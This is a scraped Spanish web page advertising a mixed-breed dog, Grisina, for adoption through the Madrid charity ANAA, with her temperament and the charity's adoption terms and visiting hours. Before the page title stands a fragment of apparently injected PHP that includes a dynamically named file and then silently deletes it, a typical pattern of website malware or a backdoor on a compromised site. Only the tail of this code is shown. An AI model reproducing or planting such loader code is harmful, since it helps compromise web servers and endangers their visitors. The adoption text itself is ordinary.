');fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> GRISINA - Adopta tu Perro

GRISINA

Vídeo
Fecha del anuncio
Sep 10, 2021
Provincia
Visitas
26
DESCRIPCIÓN

Edad: 4 años y 11 meses
F. nac.: 27-10-2016
Raza: Mestizo
Sexo: Hembra
Tamaño: grande
Peso: 30 Kg
Esterilizado: Sí
Carácter: Muy mimosa, fiel y obediente. Le encanta restregarse en ti como un gatito.
Los inicios son complicados porque desconfía y teme a algunas personas. Pero si le das tiempo y paciencia en unos días te demostrará todo su amor. Es una perra fiel, cariñosa y obediente. Si le dices que se siente ella lo hace, si le dices que te de la patita ella te da la derecha, y si le dices que la otra ella levanta la izquierda. Su mayor recompensa son los mimos, le encantan!! Pero es verdad que en cuanto ve una chuche empieza a babear pidiéndote una. Se sienta y espera, puede llegar a ser muy paciente y si empiezas a andar con la chuche en la mano, Grisi te adelante y se sienta delante tuya, saca la lengua con la baba colgando deseando que se la des. El bozal no le gusta mucho, pero sabe que es señal de que toca paseo. Se sienta al lado de la puerta y espera a que se lo pongas, o bien se echa boca arriba para que le des algún mimo. A pesar de que no le hace mucha gracia el bozal, al final salimos con él puesto y la correa.Pasea bien, va tranquila a tu lado durante el paseo, aunque si ve algo que le da curiosidad empieza a pasearte ella a ti. Es una perra que está dispuesta a seguir aprendiendo y de hecho ha mejorado mucho y sigue haciéndolo. A veces le dan momentos de felicidad extrema que aun le cuesta controlar y se vuelve muy bruta, se piensa que pesa poco y puede hacer algo de daño. Pero con serenidad y mucha calma es maravillosa, muy lista y sobretodo una compañera fiel para siempre.Grisina necesita salir ya de ANAA pero lo necesita con una persona que sepa de perros y quiera dedicarle todo el tiempo y amor que ella necesita.Si crees que puedes ser su compi de vida no dudes en escribirnos a nuestro correo anaa@anaaweb.org y conocerla.
Si te decides por adoptar un perro o un cachorro en ANAA, te lo llevarás a casa vacunado, desparasitado, con análisis de leishmaniosis y esterilizado (en caso de cachorros o de animales que no estén aún esterilizados en el momento de la adopción, dicha intervención será realizada gratuitamente por nuestros veterinarios). Para cubrir una pequeña parte de todos estos gastos, ANAA pide 120€ por adopción en concepto de donativo. ANAA sólo entrega a sus animales en adopción en la Comunidad de Madrid.
AVISO IMPORTANTE: Las adopciones y visitas al Centro de Adopción se concentran principalmente los sábados de 12 a 18 h, por lo que en función de la afluencia de gente el tiempo de espera hasta ser atendidos y el tiempo de elección y formalización de la adopción puede llegar a alargarse varias horas. Dada la importancia de conseguir una correcta elección del animal y un completo asesoramiento, rogamos se tenga en cuenta esta situación y se vaya con idea de dedicar el día a la visita a nuestro centro, pensando incluso en la posibilidad de llevar comida preparada para tomarla allí si se va a media mañana. Recordamos que si se está interesado en un animal adulto la adopción puede realizarse entresemana con cita previa. Las adopciones de cachorros sólo pueden efectuarse los sábados, dado que el resto de la semana están en casas de acogida. Para más información escríbenos a anaa@anaaweb.org

FEATURES

user-logo
ANAA - Asociación Nacional Amigos de los Aimales

Dirección: Zona Norte de Madrid, Madrid Llamar: 916672036 - 9 a 14h Web: http://www.anaaweb.org
Tienda Adoptatuperro
Todos los derechos reservados © 2021 Adoptatuperro.es
X